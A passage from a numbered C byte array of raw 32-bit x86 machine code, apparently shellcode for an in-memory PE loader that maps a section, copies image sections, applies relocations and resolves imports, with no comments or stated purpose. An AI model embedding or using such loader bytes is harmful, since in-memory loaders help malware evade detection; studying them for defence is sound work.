737 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00, 0x0f, 0x88, 0xa7, 0x01, 0x00, 0x00,
738 0xc7, 0x45, 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x0f, 0xb6,
739 0x80, 0x0c, 0x04, 0x00, 0x00, 0x84, 0xc0, 0x0f, 0x84, 0x0e, 0x01, 0x00,
740 0x00, 0x8b, 0x45, 0x0c, 0x8d, 0x90, 0x0c, 0x04, 0x00, 0x00, 0x8d, 0x85,
741 0x76, 0xfd, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0x89, 0x54, 0x24, 0x04,
742 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x84, 0xe7, 0xff, 0xff, 0x8b,
743 0x45, 0x08, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x8d, 0x95, 0x70, 0xfd,
744 0xff, 0xff, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0x76, 0xfd, 0xff, 0xff,
745 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xe4, 0x8b,
746 0x45, 0x08, 0x8b, 0x80, 0x88, 0x00, 0x00, 0x00, 0x8b, 0x95, 0x70, 0xfd,
747 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24, 0x04, 0x00, 0x00,
748 0x00, 0x00, 0xc7, 0x04, 0x24, 0x0c, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83,
749 0xec, 0x0c, 0x89, 0x45, 0xf4, 0x83, 0x7d, 0xf4, 0x00, 0x0f, 0x84, 0x94,
750 0x00, 0x00, 0x00, 0xc7, 0x45, 0x84, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x7a,
751 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x9c, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x84,
752 0x8d, 0x0c, 0x95, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xe4, 0x01, 0xca,
753 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
754 0xd0, 0x66, 0xc7, 0x45, 0xc8, 0x08, 0x00, 0x8b, 0x45, 0x08, 0x8b, 0x80,
755 0x8c, 0x00, 0x00, 0x00, 0x8d, 0x55, 0xc8, 0x89, 0x54, 0x24, 0x08, 0x8d,
756 0x55, 0x84, 0x89, 0x54, 0x24, 0x04, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24,
757 0xff, 0xd0, 0x83, 0xec, 0x0c, 0x89, 0x45, 0xf0, 0x83, 0x7d, 0xf0, 0x00,
758 0x79, 0x1b, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0x90, 0x00, 0x00, 0x00, 0x8b,
759 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xc7, 0x45,
760 0xf4, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x84, 0x83, 0xc0, 0x01, 0x89,
761 0x45, 0x84, 0x8b, 0x45, 0x84, 0x8b, 0x95, 0x70, 0xfd, 0xff, 0xff, 0x39,
762 0xd0, 0x0f, 0x82, 0x75, 0xff, 0xff, 0xff, 0x83, 0x7d, 0xf0, 0x00, 0x78,
763 0x7a, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x80, 0xe4,
764 0x00, 0x00, 0x00, 0x8b, 0x55, 0x10, 0x8b, 0x52, 0x18, 0x8d, 0x4d, 0xb8,
765 0x89, 0x4c, 0x24, 0x24, 0x8b, 0x4d, 0xf4, 0x89, 0x4c, 0x24, 0x20, 0x8b,
766 0x4d, 0x98, 0x89, 0x4c, 0x24, 0x10, 0x8b, 0x4d, 0x9c, 0x89, 0x4c, 0x24,
767 0x14, 0x8b, 0x4d, 0xa0, 0x89, 0x4c, 0x24, 0x18, 0x8b, 0x4d, 0xa4, 0x89,
768 0x4c, 0x24, 0x1c, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7,
769 0x44, 0x24, 0x08, 0x18, 0x01, 0x00, 0x00, 0x8b, 0x4d, 0xe8, 0x89, 0x4c,
770 0x24, 0x04, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x28, 0x89, 0x45,
771 0xf0, 0x83, 0x7d, 0xf4, 0x00, 0x74, 0x14, 0x8b, 0x45, 0x08, 0x8b, 0x80,
772 0x90, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xf4, 0x89, 0x14, 0x24, 0xff, 0xd0,
773 0x83, 0xec, 0x04, 0x8b, 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00,
774 0x8b, 0x55, 0xe8, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x8b,
775 0x45, 0x08, 0x8b, 0x80, 0xa0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0xec, 0x89,
776 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0xb8, 0x01, 0x00, 0x00, 0x00,
777 0x8b, 0x5d, 0xfc, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x83, 0xec, 0x28, 0x8b,
778 0x45, 0x0c, 0x8b, 0x40, 0x18, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
779 0x8b, 0x40, 0x18, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
780 0x52, 0x18, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
781 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x18, 0x00, 0x00, 0x00, 0x00, 0x8b,
782 0x45, 0x0c, 0x8b, 0x40, 0x1c, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
783 0x8b, 0x40, 0x1c, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
784 0x52, 0x1c, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
785 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x1c, 0x00, 0x00, 0x00, 0x00, 0x8b,
786 0x45, 0x0c, 0x8b, 0x40, 0x14, 0x85, 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c,
787 0x8b, 0x40, 0x14, 0x8b, 0x00, 0x8b, 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b,
788 0x52, 0x14, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45,
789 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40, 0x14, 0x00, 0x00, 0x00, 0x00, 0x8b,
790 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x85, 0xc0, 0x74, 0x68, 0x8b, 0x45, 0x0c,
791 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x50, 0x8b, 0x55, 0x0c, 0x8b,
792 0x4a, 0x10, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x4c, 0x24, 0x04,
793 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0x89, 0x45, 0xf4, 0x8b,
794 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b, 0x40, 0x2c, 0x8b, 0x55,
795 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x04,
796 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x08, 0x8b, 0x00, 0x8b,
797 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x08, 0x89, 0x14, 0x24, 0xff,
798 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
799 0x08, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x85,
800 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x10, 0x8b, 0x00, 0x8b,
801 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x10, 0x89, 0x14, 0x24, 0xff,
802 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
803 0x10, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x85,
804 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x0c, 0x8b, 0x00, 0x8b,
805 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x0c, 0x89, 0x14, 0x24, 0xff,
806 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
807 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
808 0xc0, 0x74, 0x26, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x8b, 0x00, 0x8b,
809 0x40, 0x08, 0x8b, 0x55, 0x0c, 0x8b, 0x52, 0x04, 0x89, 0x14, 0x24, 0xff,
810 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x40,
811 0x04, 0x00, 0x00, 0x00, 0x00, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x85, 0xc0,
812 0x74, 0x23, 0x8b, 0x45, 0x0c, 0x8b, 0x00, 0x8b, 0x00, 0x8b, 0x40, 0x08,
813 0x8b, 0x55, 0x0c, 0x8b, 0x12, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec,
814 0x04, 0x89, 0x45, 0xf4, 0x8b, 0x45, 0x0c, 0xc7, 0x00, 0x00, 0x00, 0x00,
815 0x00, 0x90, 0xc9, 0xc3, 0x55, 0x89, 0xe5, 0x57, 0x56, 0x53, 0x81, 0xec,
816 0x4c, 0x04, 0x00, 0x00, 0xc7, 0x85, 0x3c, 0xff, 0xff, 0xff, 0x00, 0x00,
817 0x00, 0x00, 0xc7, 0x45, 0xc8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xb8,
818 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x00, 0x00,
819 0x00, 0x00, 0xc7, 0x85, 0x18, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
820 0x8b, 0x45, 0x08, 0x8b, 0x90, 0xfc, 0x01, 0x00, 0x00, 0x8b, 0x80, 0xf8,
821 0x01, 0x00, 0x00, 0x89, 0x45, 0xb4, 0x8b, 0x45, 0x0c, 0x05, 0x28, 0x05,
822 0x00, 0x00, 0x89, 0x45, 0xb0, 0x8b, 0x45, 0xb0, 0x89, 0x45, 0xac, 0x8b,
823 0x45, 0xac, 0x8b, 0x40, 0x3c, 0x89, 0xc2, 0x8b, 0x45, 0xb0, 0x01, 0xd0,
824 0x89, 0x45, 0xa8, 0x8b, 0x45, 0x08, 0x8b, 0x40, 0x38, 0xc7, 0x04, 0x24,
825 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x83, 0xec, 0x04, 0x89, 0x45, 0xa4,
826 0x8b, 0x45, 0xa4, 0x89, 0x45, 0xa0, 0x8b, 0x45, 0xa0, 0x8b, 0x40, 0x3c,
827 0x89, 0xc2, 0x8b, 0x45, 0xa4, 0x01, 0xd0, 0x89, 0x45, 0x9c, 0x8b, 0x45,
828 0xa8, 0x0f, 0xb7, 0x50, 0x04, 0x8b, 0x45, 0x9c, 0x0f, 0xb7, 0x40, 0x04,
829 0x66, 0x39, 0xc2, 0x0f, 0x85, 0x2a, 0x11, 0x00, 0x00, 0x8b, 0x45, 0xa8,
830 0x8b, 0x40, 0x50, 0xba, 0x00, 0x00, 0x00, 0x00, 0x89, 0x85, 0x20, 0xfc,
831 0xff, 0xff, 0x89, 0x95, 0x24, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8, 0x8b,
832 0x80, 0xa4, 0x00, 0x00, 0x00, 0x89, 0x45, 0x98, 0x83, 0x7d, 0x98, 0x00,
833 0x0f, 0x95, 0xc0, 0x0f, 0xb6, 0xc0, 0x89, 0x45, 0x94, 0x83, 0x7d, 0x94,
834 0x00, 0x75, 0x0c, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x34, 0x89, 0x85, 0x1c,
835 0xfc, 0xff, 0xff, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05, 0x00,
836 0x00, 0x84, 0xc0, 0x75, 0x59, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x1c,
837 0xc7, 0x44, 0x24, 0x18, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x14,
838 0x00, 0x00, 0x00, 0x08, 0xc7, 0x44, 0x24, 0x10, 0x40, 0x00, 0x00, 0x00,
839 0x8d, 0x85, 0x20, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44,
840 0x24, 0x08, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00,
841 0x0f, 0x00, 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8,
842 0x7d, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f,
843 0x89, 0x63, 0x01, 0x00, 0x00, 0xe9, 0xac, 0x10, 0x00, 0x00, 0x8b, 0x45,
844 0x08, 0x8b, 0x80, 0xf0, 0x00, 0x00, 0x00, 0x8b, 0x55, 0x08, 0x81, 0xc2,
845 0xfb, 0x05, 0x00, 0x00, 0x89, 0x54, 0x24, 0x04, 0x8d, 0x95, 0xdc, 0xfb,
846 0xff, 0xff, 0x89, 0x14, 0x24, 0xff, 0xd0, 0x83, 0xec, 0x08, 0xc7, 0x85,
847 0xec, 0xfb, 0xff, 0xff, 0x18, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf0, 0xfb,
848 0xff, 0xff, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x85, 0xf8, 0xfb, 0xff, 0xff,
849 0x40, 0x00, 0x00, 0x00, 0x8d, 0x85, 0xdc, 0xfb, 0xff, 0xff, 0x89, 0x85,
850 0xf4, 0xfb, 0xff, 0xff, 0xc7, 0x85, 0xfc, 0xfb, 0xff, 0xff, 0x00, 0x00,
851 0x00, 0x00, 0xc7, 0x85, 0x00, 0xfc, 0xff, 0xff, 0x00, 0x00, 0x00, 0x00,
852 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24, 0x2c, 0xc7, 0x44, 0x24, 0x28, 0x00,
853 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x24, 0x00, 0x00, 0x00, 0x00, 0xc7,
854 0x44, 0x24, 0x20, 0x40, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x01,
855 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x18, 0x01, 0x00, 0x00, 0x00, 0xc7,
856 0x44, 0x24, 0x14, 0x80, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
857 0x00, 0x00, 0x00, 0x8d, 0x85, 0xe4, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24,
858 0x0c, 0x8d, 0x85, 0xec, 0xfb, 0xff, 0xff, 0x89, 0x44, 0x24, 0x08, 0xc7,
859 0x44, 0x24, 0x04, 0x00, 0x00, 0x00, 0x80, 0x8d, 0x85, 0x04, 0xfc, 0xff,
860 0xff, 0x89, 0x04, 0x24, 0xe8, 0xb1, 0x32, 0x00, 0x00, 0x89, 0x45, 0x90,
861 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xac, 0x0f, 0x00, 0x00, 0x8b, 0x85,
862 0x04, 0xfc, 0xff, 0xff, 0x83, 0xf8, 0xff, 0x0f, 0x84, 0x9d, 0x0f, 0x00,
863 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84, 0x8f,
864 0x0f, 0x00, 0x00, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4,
865 0x89, 0x54, 0x24, 0x1c, 0x89, 0x44, 0x24, 0x18, 0xc7, 0x44, 0x24, 0x14,
866 0x00, 0x00, 0x00, 0x01, 0xc7, 0x44, 0x24, 0x10, 0x02, 0x00, 0x00, 0x00,
867 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x08,
868 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x04, 0x1f, 0x00, 0x0f, 0x00,
869 0x8d, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0x2f, 0x31,
870 0x00, 0x00, 0x89, 0x45, 0x90, 0x8b, 0x85, 0x04, 0xfc, 0xff, 0xff, 0x8b,
871 0x55, 0xb4, 0x89, 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0x86, 0x31,
872 0x00, 0x00, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0x29, 0x0f, 0x00, 0x00,
873 0x8b, 0x85, 0x2c, 0xfc, 0xff, 0xff, 0x8b, 0x55, 0xb4, 0x89, 0x54, 0x24,
874 0x28, 0xc7, 0x44, 0x24, 0x24, 0x04, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24,
875 0x20, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x1c, 0x02, 0x00, 0x00,
876 0x00, 0x8d, 0x95, 0x18, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x18, 0xc7,
877 0x44, 0x24, 0x14, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x10, 0x00,
878 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x8d,
879 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0xc7, 0x44, 0x24,
880 0x04, 0xff, 0xff, 0xff, 0xff, 0x89, 0x04, 0x24, 0xe8, 0xc7, 0x30, 0x00,
881 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88, 0xbe, 0x0e,
882 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x85, 0xc0, 0x0f, 0x84,
883 0xb3, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0x08, 0x0f, 0xb6, 0x80, 0xfb, 0x05,
884 0x00, 0x00, 0x84, 0xc0, 0x74, 0x5e, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
885 0x89, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x8b, 0x85, 0x18, 0xfc, 0xff, 0xff,
886 0x89, 0x85, 0x10, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xb4, 0x89, 0x44, 0x24,
887 0x14, 0x8d, 0x85, 0x30, 0xfc, 0xff, 0xff, 0x89, 0x44, 0x24, 0x10, 0xc7,
888 0x44, 0x24, 0x0c, 0x04, 0x00, 0x00, 0x00, 0x8d, 0x85, 0x10, 0xfc, 0xff,
889 0xff, 0x89, 0x44, 0x24, 0x08, 0x8d, 0x85, 0x14, 0xfc, 0xff, 0xff, 0x89,
890 0x44, 0x24, 0x04, 0xc7, 0x04, 0x24, 0xff, 0xff, 0xff, 0xff, 0xe8, 0xd7,
891 0x30, 0x00, 0x00, 0x89, 0x45, 0x90, 0x83, 0x7d, 0x90, 0x00, 0x0f, 0x88,
892 0x4a, 0x0e, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x50, 0x54, 0x8b, 0x85,
893 0x1c, 0xfc, 0xff, 0xff, 0x89, 0x54, 0x24, 0x08, 0x8b, 0x55, 0xb0, 0x89,
894 0x54, 0x24, 0x04, 0x89, 0x04, 0x24, 0xe8, 0xa3, 0x2a, 0x00, 0x00, 0x8b,
895 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x14, 0x0f, 0xb7, 0xd0, 0x8b, 0x45, 0xa8,
896 0x01, 0xd0, 0x83, 0xc0, 0x18, 0x89, 0x45, 0x8c, 0xc7, 0x45, 0xc4, 0x00,
897 0x00, 0x00, 0x00, 0xeb, 0x67, 0x8b, 0x55, 0xc4, 0x89, 0xd0, 0xc1, 0xe0,
898 0x02, 0x01, 0xd0, 0xc1, 0xe0, 0x03, 0x89, 0xc2, 0x8b, 0x45, 0x8c, 0x01,
899 0xd0, 0x8b, 0x50, 0x10, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02,
900 0x01, 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8,
901 0x8b, 0x48, 0x14, 0x8b, 0x45, 0xb0, 0x8d, 0x1c, 0x01, 0x8b, 0xb5, 0x1c,
902 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0xc4, 0x89, 0xc8, 0xc1, 0xe0, 0x02, 0x01,
903 0xc8, 0xc1, 0xe0, 0x03, 0x89, 0xc1, 0x8b, 0x45, 0x8c, 0x01, 0xc8, 0x8b,
904 0x40, 0x0c, 0x01, 0xf0, 0x89, 0x54, 0x24, 0x08, 0x89, 0x5c, 0x24, 0x04,
905 0x89, 0x04, 0x24, 0xe8, 0x22, 0x2a, 0x00, 0x00, 0x83, 0x45, 0xc4, 0x01,
906 0x8b, 0x45, 0xa8, 0x0f, 0xb7, 0x40, 0x06, 0x0f, 0xb7, 0xc0, 0x39, 0x45,
907 0xc4, 0x72, 0x8a, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xa8,
908 0x8b, 0x40, 0x34, 0xf7, 0xd8, 0x01, 0xd0, 0x89, 0x45, 0x88, 0x83, 0x7d,
909 0x94, 0x00, 0x0f, 0x84, 0x52, 0x01, 0x00, 0x00, 0x83, 0x7d, 0x88, 0x00,
910 0x0f, 0x84, 0x48, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xa8, 0x8b, 0x80, 0xa0,
911 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff,
912 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xcc, 0xe9, 0x04,
913 0x01, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x83, 0xc0, 0x08, 0x89, 0x45, 0xd0,
914 0xe9, 0xdc, 0x00, 0x00, 0x00, 0x8b, 0x45, 0xcc, 0x8b, 0x10, 0x8b, 0x45,
915 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f, 0x0f, 0xb7, 0xc0, 0x01,
916 0xc2, 0x8b, 0x45, 0xa8, 0x8b, 0x40, 0x50, 0x39, 0xc2, 0x0f, 0x83, 0xb6,
917 0x00, 0x00, 0x00, 0x8b, 0x95, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x45, 0xcc,
918 0x8b, 0x08, 0x8b, 0x45, 0xd0, 0x0f, 0xb7, 0x00, 0x66, 0x25, 0xff, 0x0f,
919 0x0f, 0xb7, 0xc0, 0x01, 0xc8, 0x01, 0xd0, 0x89, 0x45, 0x80, 0x8b, 0x45,
920 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0xa0, 0x75, 0x11,
921 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45,
922 0x80, 0x89, 0x10, 0xeb, 0x78, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01,
923 0x83, 0xe0, 0xf0, 0x3c, 0x30, 0x75, 0x11, 0x8b, 0x45, 0x80, 0x8b, 0x10,
924 0x8b, 0x45, 0x88, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x59,
925 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c, 0x10,
926 0x75, 0x17, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0xc1, 0xe8,
927 0x10, 0x0f, 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb,
928 0x34, 0x8b, 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x3c,
929 0x20, 0x75, 0x14, 0x8b, 0x45, 0x80, 0x8b, 0x10, 0x8b, 0x45, 0x88, 0x0f,
930 0xb7, 0xc0, 0x01, 0xc2, 0x8b, 0x45, 0x80, 0x89, 0x10, 0xeb, 0x12, 0x8b,
931 0x45, 0xd0, 0x0f, 0xb6, 0x40, 0x01, 0x83, 0xe0, 0xf0, 0x84, 0xc0, 0x0f,
932 0x85, 0xc9, 0x0b, 0x00, 0x00, 0x83, 0x45, 0xd0, 0x02, 0x8b, 0x45, 0xcc,
933 0x8b, 0x50, 0x04, 0x8b, 0x45, 0xcc, 0x01, 0xd0, 0x39, 0x45, 0xd0, 0x0f,
934 0x85, 0x10, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xd0, 0x89, 0x45, 0xcc, 0x8b,
935 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x8b, 0x4d, 0x84, 0x8b, 0x55, 0x98, 0x01,
936 0xca, 0x01, 0xd0, 0x39, 0x45, 0xcc, 0x73, 0x0e, 0x8b, 0x45, 0xcc, 0x8b,
937 0x40, 0x04, 0x85, 0xc0, 0x0f, 0x85, 0xd9, 0xfe, 0xff, 0xff, 0x8b, 0x45,
938 0xa8, 0x8b, 0x80, 0x80, 0x00, 0x00, 0x00, 0x89, 0x45, 0x84, 0x83, 0x7d,
939 0x84, 0x00, 0x0f, 0x84, 0x46, 0x01, 0x00, 0x00, 0x8b, 0x85, 0x1c, 0xfc,
940 0xff, 0xff, 0x89, 0xc2, 0x8b, 0x45, 0x84, 0x01, 0xd0, 0x89, 0x45, 0xdc,
941 0xe9, 0x23, 0x01, 0x00, 0x00, 0x8b, 0x45, 0xdc, 0x8b, 0x50, 0x0c, 0x8b,
942 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x85, 0x7c, 0xff, 0xff,
943 0xff, 0x8b, 0x85, 0x7c, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b,
944 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x7a, 0xe1, 0xff, 0xff, 0x89, 0x85,
945 0x78, 0xff, 0xff, 0xff, 0x8b, 0x45, 0xdc, 0x8b, 0x10, 0x8b, 0x85, 0x1c,
946 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45, 0xe4, 0x8b, 0x45, 0xdc, 0x8b,
947 0x50, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89, 0x45,
948 0xe0, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x0f, 0x84, 0xc1, 0x00,
949 0x00, 0x00, 0x8b, 0x45, 0xe4, 0x8b, 0x00, 0x85, 0xc0, 0x79, 0x2f, 0x8b,
950 0x45, 0xe4, 0x8b, 0x00, 0x89, 0x44, 0x24, 0x0c, 0xc7, 0x44, 0x24, 0x08,
951 0x00, 0x00, 0x00, 0x00, 0x8b, 0x85, 0x78, 0xff, 0xff, 0xff, 0x89, 0x44,
952 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0xbe, 0xde, 0xff,
953 0xff, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb, 0x7c, 0x8b, 0x45,
954 0xe4, 0x8b, 0x10, 0x8b, 0x85, 0x1c, 0xfc, 0xff, 0xff, 0x01, 0xd0, 0x89,
955 0x85, 0x74, 0xff, 0xff, 0xff, 0x8b, 0x45, 0x0c, 0x8b, 0x40, 0x04, 0x85,
956 0xc0, 0x74, 0x2e, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02,
957 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89, 0x04, 0x24, 0xe8, 0x57,
958 0x0b, 0x00, 0x00, 0x85, 0xc0, 0x74, 0x12, 0x8b, 0x45, 0x08, 0x8b, 0x80,
959 0xf4, 0x00, 0x00, 0x00, 0x89, 0xc2, 0x8b, 0x45, 0xe0, 0x89, 0x10, 0xeb,
960 0x31, 0x8b, 0x85, 0x74, 0xff, 0xff, 0xff, 0x83, 0xc0, 0x02, 0xc7, 0x44,
961 0x24, 0x0c, 0x00, 0x00, 0x00, 0x00, 0x89, 0x44, 0x24, 0x08, 0x8b, 0x85,
962 0x78, 0xff, 0xff, 0xff, 0x89, 0x44, 0x24, 0x04, 0x8b, 0x45, 0x08, 0x89,
